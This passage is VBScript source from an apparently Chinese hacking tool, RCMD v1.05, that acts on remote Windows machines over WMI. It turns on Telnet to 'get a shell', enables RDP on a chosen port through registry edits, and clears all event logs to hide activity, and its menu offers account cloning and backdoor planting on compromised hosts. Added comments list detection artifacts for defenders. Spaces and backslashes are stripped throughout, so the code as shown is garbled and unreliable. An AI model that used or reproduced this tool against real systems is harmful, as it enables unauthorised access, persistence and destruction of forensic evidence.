setobjmethod=objinstance.methods_("terminate")
setobjinparam=objmethod.inparameters.spawninstance_()
objinparam.reason=0
setobjoutparam=objinstance.execmethod_("terminate",objinparam)
showerror(objoutparam.returnvalue)
wscript.echo"Theprocess'sid="&strprocess&"havebeenkilledSuccessfully!"
endif
callmain()
endfunction
'********************************************************
' telnet(): toggles the target's Telnet server (service tlntsvr). It reconnects to
' the cimv2 namespace, and for the tlntsvr service: if its start mode is Disabled
' it is switched to Manual via ChangeStartMode; if the service is running it is
' stopped; otherwise the operator is asked for an NTLM mode (0-2) and a port, both
' are written as DWORDs to HKLM\SOFTWARE\Microsoft\TelnetServer\1.0 ("NTLM" and
' "TelnetPort") through StdRegProv.SetDWORDValue, and the service is started.
' Defender notes: tlntsvr start-mode changes and starts, and modifications of the
' NTLM/TelnetPort values - particularly a non-default port - are the artifacts.
functiontelnet()
outstreem.write"Queryingstateoftelnetserver...."
setobjswbemservices=objlocator.connectserver(ipaddress,"rootcimv2",username,password)
setcolinstances=objswbemservices.execquery("select*fromwin32_servicewherename='tlntsvr'")
showerror(err.number)
foreachobjinstanceincolinstances
' a Disabled service cannot be started; move it to Manual first
ifobjinstance.startmode="Disabled"then
outstreem.write"Telnetserverhasbeendisabled.Nowchangeingstartmodetomanual...."
setobjmethod=objinstance.methods_("changestartmode")
setobjinparam=objmethod.inparameters.spawninstance_()
objinparam.startmode="Manual"
setobjoutparam=objinstance.execmethod_("changestartmode",objinparam)
showerror(objoutparam.returnvalue)
endif
outstreem.write"Changeingstate...."
' running -> stop it; stopped -> configure and start it
ifobjinstance.started=truethen
intstatus=objinstance.stopservice()
showerror(intstatus)
wscript.echo"TargettelnetserverhasbeenSTOPSuccessfully."
else
showerror(intstatus)
wscript.echo"pleseenterthentlm:"
ntlm=WScript.StdIn.Readline()
wscript.echo"pleseentertheport:"
port=WScript.StdIn.Readline()
ifnotisnumeric(ntlm)orntlm<0orntlm>2then
wscript.echo"ThevalueofNTMLiswrong."
callmain()
endif
ifnotisnumeric(port)then
wscript.echo"Thevalueofportiswrong."
main()
endif
' registry writes go through the root/default StdRegProv class
setobjswbemservices1=objlocator.connectserver(ipaddress,"root/default",username,password)
outstreem.write"SettingNTLM="&ntlm&"...."
setobjinstance1=objswbemservices1.get("stdregprov")
setobjmethod=objinstance1.methods_("SetDWORDvalue")
setobjinparam=objmethod.inparameters.spawninstance_()
' &h80000002 = HKEY_LOCAL_MACHINE
objinparam.hdefkey=&h80000002
objinparam.ssubkeyname="SOFTWAREMicrosoftTelnetServer1.0"
objinparam.svaluename="NTLM"
objinparam.uvalue=ntlm
setobjoutparam=objinstance1.execmethod_("SetDWORDvalue",objinparam)
showerror(objoutparam.returnvalue)
outstreem.write"Settingport="&port&"...."
' same in-parameter object reused for the second value
objinparam.svaluename="TelnetPort"
objinparam.uvalue=port
setobjoutparam=objinstance1.execmethod_("SetDWORDvalue",objinparam)
showerror(objoutparam.returnvalue)
intstatus=objinstance.startservice()
wscript.echo"TargettelnetserverhasbeenSTARTSuccessfully!"
wscript.echo"Now,youcantry:telnet"&ipaddress&""&port&",togetashell."
endif
next
callmain()
endfunction
'********************************************************
' rs(): enables Terminal Services (RDP) on the target by registry edit. It first
' checks that the OS caption contains "Server" (otherwise it returns to the menu),
' asks for a port number (1-65000), then writes through StdRegProv under HKLM:
' netcache\Enabled=0, Policies\...\Windows\Installer\EnableAdminTSRemote=1,
' Control\Terminal Server\TSEnabled=1, Services\TermDD\Start=2 and
' Services\TermService\Start=2 (automatic), a Keyboard Layout\Toggle\Hotkey string,
' and WinStations\RDP-Tcp\PortNumber=port. Changes take effect after a reboot, so
' the operator is offered reboot() at the end.
' Defender notes: TSEnabled flipping to 1, TermService/TermDD start-type changes and
' a non-default RDP-Tcp PortNumber are the artifacts; a listener on that port
' follows the reboot.
functionrs()
outstreem.write"CheckingTheOSType...."
setcolinstoscaption=objswbemservices.execquery("selectcaptionfromwin32_operatingsystem")
foreachobjinstoscaptionincolinstoscaption
ifinstr(objinstoscaption.caption,"Server")>0then
wscript.echo"OK!"
else
wscript.echo"OK!"
wscript.echo"OSTypeis"&objinstoscaption.caption
wscript.echo"youcann'topenterminalservices,canceling...."&chr(13)'60
callmain()
endif
next
wscript.echo"pleseentertheport:"
port=WScript.StdIn.Readline()
ifnotisnumeric(port)orport<1orport>65000then'50
wscript.echo"Thenumberofportiserror."
callmain()
endif
outstreem.write"Writingintoregistry...."
setobjinstreg=objlocator.connectserver(ipaddress,"root/default",username,password).get("stdregprov")
' &h80000002 = HKEY_LOCAL_MACHINE
HKLM=&h80000002
withobjinstreg
.createkey,"SOFTWAREMicrosoftWindowsCurrentVersionnetcache"
.setdwordvalueHKLM,"SOFTWAREMicrosoftWindowsCurrentVersionnetcache","Enabled",0'70
.createkeyHKLM,"SOFTWAREPoliciesMicrosoftWindowsInstaller"
.setdwordvalueHKLM,"SOFTWAREPoliciesMicrosoftWindowsInstaller","EnableAdminTSRemote",1
' Start=2 is SERVICE_AUTO_START for the RDP driver and service
.setdwordvalueHKLM,"SYSTEMCurrentControlSetControlTerminalServer","TSEnabled",1
.setdwordvalueHKLM,"SYSTEMCurrentControlSetServicesTermDD","Start",2
.setdwordvalueHKLM,"SYSTEMCurrentControlSetServicesTermService","Start",2
.setstringvalueHKLM,".DEFAULTKeyboardLayoutToggle","Hotkey","1"
.setdwordvalueHKLM,"SYSTEMCurrentControlSetControlTerminalServerWinStationsRDP-Tcp","PortNumber",port
endwith
showerror(err.number)
wscript.echo"Now,youneedtoreboottarget!"
wscript.echo"Doyouwanttoreboottargetnow?[y/n]"
strcancel=WScript.StdIn.Readline()
ifstrcancel="n"then
wscript.echo"youneedtoreboottargetthen!!"
callmain()
else
callreboot()
endif
wscript.echo"Youcanlogonterminalserviceson"&port&"later,Goodluck!"
callmain()
endFunction
'**************************************************************
' clog(): anti-forensics - clears every event log on the target by calling
' ClearEventLog on each Win32_NTEventLogFile instance (query flag &h20 =
' wbemFlagForwardOnly). The loop stops at the first non-zero return value.
' Defender notes: clearing itself is logged - the Security log records an
' "audit log was cleared" event (1102 on Vista and later, 517 on earlier systems)
' and the System log a 104 - so a burst of those right after a WMI logon is the
' signal; forwarded logs are unaffected by this routine.
functionclog()
outstreem.write"Clearingalllogs...."
strwqlquery="select*fromWin32_NTEventLogFile"
setcolinstances=objswbemservices.execquery(strwqlquery,"wql",&h20)
foreachobjinstanceincolinstances
ifobjinstance.cleareventlog()<>0then
wscript.echo"Error!"'100
callmain()
endif
next
wscript.echo"OK!"
wscript.echo"AlllogshavebeenclearedSuccessfully!"
callmain()
endfunction
'***************************************************************
' showerror(errornumber): outcome reporter used after each WMI operation. A
' non-zero errornumber prints Err.Number (hex) and Err.Description and returns to
' the main menu; zero prints "OK!". As in showerroronly, the printed number is
' taken from the global Err object rather than from the argument, so callers that
' pass a WMI ReturnValue get Err.Number displayed instead.
functionshowerror(errornumber)
iferrornumberThen
wscript.echo"Error0x"&cstr(hex(err.number))&"."
iferr.description<>""then
wscript.echo"Errordescription:"&err.description&"."
endif
callmain()
else
wscript.echo"OK!"
endif
endfunction
'*****************************************************************
' usage(): prints the banner (tool name/version, author contact) and the
' command-line syntax: cscript <script> <target IP> <user name> <password>.
functionusage()
wscript.echostring(79,"*")
wscript.echo"RCMDv1.05"
wscript.echo"RemoteexecutionScript,by黑嘿黑"
wscript.echo"Welcometovisitewww.xyhack.91i.net"
wscript.echo"QQ:123230273E-mail:cnhacker521@hotmail.com"
wscript.echo"Usage:"
wscript.echo"cscript"&wscript.scriptfullname&"targetIPusernamepassword"
wscript.echo"Thenchosethecommand>"
wscript.echostring(79,"*")
endfunction
'**********************************************************
' main(): interactive menu and dispatcher. Prints the option list, reads one line
' from stdin and calls the matching routine; every routine ends by calling main()
' again, so the menu loops by recursion rather than by an explicit loop. Menu
' labels are Chinese: 退出脚本 = quit, 远程开/关telnet = remote telnet on/off,
' 远程开3389 = enable RDP, 远程删除所有日志 = clear all logs, 获取...系统信息 =
' system information, 例出进程 = list processes, 删除进程 = kill process,
' 远程执行DOS命令 = run a command, 远程重启 = reboot, 服务信息 = services,
' 共享 = shares, 克隆帐号 = clone account, 种植后门 = plant backdoor.
functionmain()
wscript.echo""
wscript.echo"Nowchosethecommand>"
wscript.echo"0.quit退出脚本"
wscript.echo"1.telnet远程开/关telnet"
wscript.echo"2.3389远程开3389"
wscript.echo"3.clog远程删除所有日志"
wscript.echo"4.getf获取肉鸡系统信息"
wscript.echo"5.pslist例出进程"
wscript.echo"6.pskill删除进程"
wscript.echo"7.command远程执行DOS命令"
wscript.echo"8.reboot远程重启肉鸡"
wscript.echo"9.slist例出远程肉鸡上的服务信息"
wscript.echo"A.Share1.列出共享2.创建共享3.删除共享"
wscript.echo"B.ca克隆帐号"
wscript.echo"C.Door种植后门"
wscript.echostring(79,"*")
wscript.echo"CMD>"
cmd=WScript.StdIn.Readline()
wscript.echo""
' each option accepts a word and a number
SelectCasecmd
case"telnet","1"
telnet()
case"3389","2"
rs()
case"clog","3"
clog()
case"getf","4"
inf()
case"psl","pslist","5"
pslist()
case"psk","pskill","6"
pskill()
case"cmd","command","7"
command()
case"reboot","8"
reboot()
case"slist","9"
listlistsvr()
case"share","10","a","A"
share()
case"B","b","11"
ca()
case"C","c","12"
door()
case"quit","0"
wscript.quit
endselect
endfunction